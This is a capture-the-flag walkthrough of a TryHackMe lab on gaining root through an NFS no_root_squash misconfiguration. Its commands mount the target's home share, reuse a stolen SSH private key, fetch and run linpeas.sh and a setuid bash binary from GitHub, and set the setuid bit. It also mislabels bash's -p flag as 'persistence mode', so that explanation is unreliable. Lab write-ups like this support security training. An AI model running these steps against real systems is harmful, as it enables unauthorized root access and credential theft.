Network File System (NFS) is a file-sharing protocol used to allow computers on a network to access and share files over a network. It allows multiple users to access the same files on a remote system as if they were local files on their own computers. NFS is an important part of many enterprise networks, allowing for easy collaboration and file sharing.
OBJECTIVE
NFS (network file system) is a file system that enables file sharing between computers of different operating systems (Windows/Linux/Mac).
In this practice box from TryHackMe, we will hack into NFS and exploit a misconfiguration (No-root Squash) to obtain root access and find our final root.txt flag.
WHAT IS NO-ROOT SQUASH?
No-root Squash is an uncommon configuration (some might say a misconfiguration) on the NFS file system.
When enabled, it allows remote users to change file permissions on any file and also to add a SETUID bit to effectively run programs as the root user. Normally it is disabled to protect against hackers, and all root-created files are assigned to an unprivileged owner named nfsnobody.
👉 Recommended: If you are interested in learning more technical details about how this works, I’d recommend this article on no_root_squash and other configuration options when using NFS.
ENUMERATION
We’ll start with a standard Nmap scan of all ports with the -p- flag:
nmap $targetIP -p-
The scan shows an nfs service running on port. Let’s find out what directories are mountable with the command:
showmount -e $targetIP
(-e for exports)
Let’s go ahead and mount the /home directory to our target machine. I’m using Parrot OS virtual machine with a Mate desktop environment running in Gnome Boxes. We can mount the nfs directory directly to our local filesystem with the command:
mount -t nfs $targetIP:/home /mount
(-t indicates filetype)
And now we can continue further enumeration by poking around the filesystem.
cd /mount ls -la
We find a user folder in the home directory, cappuccino and a hidden directory .ssh. Inside the directory there is an id_rsa file that holds a private ssh key.
INITIAL FOOTHOLD – USER CAPPUCCINO
After copying the id_rsa over to our target machine, we can ssh into cappuccino’s account with this command:
ssh -i id_rsa cappuccino@$targetIP
ENUMERATING PRIVILEGE ESCALATION ATTACK VECTORS WITH LINPEAS
Now that we have our initial foothold, we can grab a copy of the well-known script linpeas.sh from the official git repo and use it to automate the enumeration of attack vectors for privilege escalation on the target machine. We’ll navigate to the /mount folder and use the command wget on our attack machine for this:
sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Before running the sh program from our target machine, we need to add execute permissions to the file from our attack machine.
The beauty of mounting NFS file systems in Linux is evident here as we can easily add permissions to linpeas.sh from our attack machine to set up the program to be executable on the target machine.
chmod +x linpeas.sh
Now that linpeas.sh is located in the /home folder of the target machine, we can run it to start the automated enumeration:
./linpeas.sh
This will dump a long text file full of details about the target machine. The most interesting things for privilege escalation are highlighted in yellow with red text.
Scrolling through the results, we quickly find the no_root_squash listed under NFS. We will now move forward and exploit this misconfiguration, allowing us to escalate privileges to the root user.
EXPLOITING NO_ROOT_SQUASH
First, let’s grab the bash executable for Ubuntu Server 18.04 from the link on TryHackMe.
Sudo wget https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
Now we add the SETUID bit to the file bash and make it executable. This is the key to gaining root access with no_root_squash.
sudo chmod +sx bash
Running bash now from our target machine doesn’t seem to change us to the root user yet.
./bash
The final trick we need to use is to enable persistence mode with the flag -p
If you liked this tutorial, you’d probably love my video walkthrough as well:
👉 Recommended Tutorial: Alice in Wonderland — TryHackMe
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.